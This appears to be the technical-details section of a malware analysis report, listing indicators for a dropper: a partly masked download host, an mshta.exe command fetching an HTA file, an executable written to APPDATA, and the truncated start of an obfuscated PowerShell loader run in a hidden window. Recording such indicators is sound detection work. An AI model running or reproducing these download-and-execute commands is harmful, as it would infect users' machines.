Technical Information
- '<SYSTEM32>\mshta.exe' http://gr#.#dns.net/prepaid.hta
- '%APPDATA%\4.exe'
- %APPDATA%\4.exe
- 'gr#.#dns.net':80
- '2.##.56.247':80
- http://gr#.#dns.net/prepaid.hta
- http://gr#.#dns.net/4.exe
- DNS query (ASK) for gr#.#dns.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function uDnDVKT($qOzxhIF, $JFqQaDW){[IO.File]::WriteAllBytes($qOzxhIF, $JFqQaDW)};function pNSyERWErIkPgQMA($qOzxhIF){if($qOzxhIF.EndsWith((PkjYelYveoOrSO @(44059...' (command line truncated in the report; process started with a hidden window)